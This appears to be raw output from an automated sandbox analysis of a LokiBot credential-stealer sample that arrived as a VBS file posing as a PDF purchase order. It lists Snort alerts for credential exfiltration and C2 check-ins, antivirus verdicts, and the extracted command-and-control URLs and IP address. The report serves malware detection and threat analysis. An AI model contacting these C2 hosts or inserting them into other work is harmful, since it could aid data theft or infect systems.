                          Timestamp:04/06/24-09:30:08.980641
                          SID:2024313
                          Source Port:49776
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:58.128553
                          SID:2825766
                          Source Port:49764
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:23.961991
                          SID:2825766
                          Source Port:49871
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:09.316933
                          SID:2825766
                          Source Port:49853
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:20.206304
                          SID:2021641
                          Source Port:49792
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:24.862546
                          SID:2021641
                          Source Port:49798
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:13.117986
                          SID:2825766
                          Source Port:49859
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:22.429106
                          SID:2021641
                          Source Port:49869
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:12.861151
                          SID:2825766
                          Source Port:49782
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:12.096911
                          SID:2024318
                          Source Port:49781
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:12.096911
                          SID:2024313
                          Source Port:49781
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:37.305241
                          SID:2021641
                          Source Port:49815
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:20.206304
                          SID:2825766
                          Source Port:49792
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:02.046578
                          SID:2024318
                          Source Port:49769
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:47.378472
                          SID:2025381
                          Source Port:49752
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:02.046578
                          SID:2024313
                          Source Port:49769
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:49.735329
                          SID:2021641
                          Source Port:49830
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:38.799315
                          SID:2021641
                          Source Port:49741
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:27.986411
                          SID:2825766
                          Source Port:49802
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:59.991734
                          SID:2025381
                          Source Port:49841
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:02.332845
                          SID:2025381
                          Source Port:49844
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:45.799677
                          SID:2024313
                          Source Port:49750
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:48.178974
                          SID:2024313
                          Source Port:49753
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:48.957388
                          SID:2025381
                          Source Port:49829
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:51.123133
                          SID:2025381
                          Source Port:49755
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:00.769505
                          SID:2024318
                          Source Port:49842
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:22.504191
                          SID:2825766
                          Source Port:49795
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:34.079276
                          SID:2021641
                          Source Port:49729
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:47.361321
                          SID:2024313
                          Source Port:49827
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:22.429106
                          SID:2825766
                          Source Port:49869
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:21.735500
                          SID:2024318
                          Source Port:49794
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:47.361321
                          SID:2024318
                          Source Port:49827
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:00.769505
                          SID:2024313
                          Source Port:49842
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:38.861510
                          SID:2021641
                          Source Port:49818
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:48.178974
                          SID:2024318
                          Source Port:49753
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:21.735500
                          SID:2024313
                          Source Port:49794
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:45.799677
                          SID:2024318
                          Source Port:49750
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:19.440133
                          SID:2024318
                          Source Port:49791
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:27.986411
                          SID:2021641
                          Source Port:49802
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:11.314149
                          SID:2025381
                          Source Port:49780
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:31.298967
                          SID:2025381
                          Source Port:49727
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:36.516498
                          SID:2024318
                          Source Port:49814
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:37.305241
                          SID:2825766
                          Source Port:49815
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:30.251229
                          SID:2024313
                          Source Port:49725
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:10.080334
                          SID:2024313
                          Source Port:49855
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:11.610579
                          SID:2025381
                          Source Port:49857
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:01.546959
                          SID:2021641
                          Source Port:49843
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:59.690030
                          SID:2024313
                          Source Port:49766
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:10.846749
                          SID:2825766
                          Source Port:49856
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:22.504191
                          SID:2021641
                          Source Port:49795
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:36.516498
                          SID:2024313
                          Source Port:49814
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:38.088060
                          SID:2025381
                          Source Port:49816
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:00.493399
                          SID:2825766
                          Source Port:49767
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:59.690030
                          SID:2024318
                          Source Port:49766
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:30:01.279270
                          SID:2025381
                          Source Port:49768
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:31:10.080334
                          SID:2024318
                          Source Port:49855
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:04/06/24-09:29:30.251229
                          SID:2024318
                          Source Port:49725
                          Destination Port:80
                          Protocol:TCP
                          Classtype:A Network Trojan was detected

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: http://kbfvzoboss.bid/alien/fre.phpURL Reputation: Label: malware
                          Source: http://alphastand.win/alien/fre.phpURL Reputation: Label: malware
                          Source: http://alphastand.win/alien/fre.phpURL Reputation: Label: malware
                          Source: http://alphastand.trade/alien/fre.phpURL Reputation: Label: malware
                          Source: http://alphastand.top/alien/fre.phpURL Reputation: Label: malware
                          Source: C:\Users\user\AppData\Local\Temp\x.exeAvira: detection malicious, Label: HEUR/AGEN.1362225
                          Source: 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://altaskifer.sbs/PWS/fre.php"]}
                          Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 73%
                          Source: C:\Users\user\AppData\Local\Temp\x.exeVirustotal: Detection: 40%Perma Link
                          Source: #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbsVirustotal: Detection: 21%Perma Link
                          Source: #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbsReversingLabs: Detection: 31%
                          Source: C:\Users\user\AppData\Local\Temp\x.exeJoe Sandbox ML: detected
                          Source: Binary string: aspnet_compiler.pdb source: 31437F.exe.4.dr
                          Source: Binary string: GenPo.pdb source: wscript.exe, 00000000.00000003.2249190359.000001A4732E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2257758604.000001A474030000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2249613824.000001A473A21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2257357620.000001A4739C2000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000000.2248791752.0000000000072000.00000002.00000001.01000000.00000006.sdmp, x.exe.0.dr
                          Source: Binary string: BATMAN.pdb source: x.exe, 00000002.00000002.2277675709.0000000002321000.00000004.00000800.00020000.00000000.sdmp, x.exe, 00000002.00000002.2279959470.0000000004920000.00000004.08000000.00040000.00000000.sdmp
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 4_2_00403D74 FindFirstFileW,4_2_00403D74
                          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h2_2_0070096C
                          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h2_2_0495A160
                          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h2_2_0495AAA8
                          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h2_2_0495AEE8

                          Networking

                          barindex
                          Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49717 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49717 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49717 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49717 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49717 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.6:49718 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49718 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49718 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.6:49718 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49718 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49719 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49719 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49719 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49719 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49719 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49720 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49720 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49720 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49720 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49720 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49721 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49721 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49721 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49721 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49721 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49722 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49722 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49722 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49722 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49722 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49723 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49723 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49723 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49723 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49723 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49724 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49724 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49724 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49724 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49724 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49725 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49725 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49725 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49725 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49725 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49727 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49727 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49727 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49727 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49727 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49728 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49728 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49728 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49728 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49728 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49729 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49729 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49729 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49729 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49729 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49731 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49731 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49731 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49731 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49731 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49734 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49734 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49734 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49734 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49734 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49737 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49737 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49737 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49737 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49737 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49739 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49739 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49739 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49739 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49739 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49740 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49740 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49740 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49740 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49740 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49741 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49741 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49741 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49741 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49741 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49742 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49742 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49742 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49742 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49742 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49743 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49743 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49743 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49743 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49743 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49744 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49744 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49744 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49744 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49744 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49745 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49745 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49745 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49745 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49745 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49746 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49746 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49746 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49746 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49746 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49747 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49747 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49747 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49747 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49747 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49748 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49748 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.6:49748 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.6:49748 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.6:49748 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.6:49749 -> 172.67.148.126:80
                          Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.6:49749 -> 172.67.148.126:80
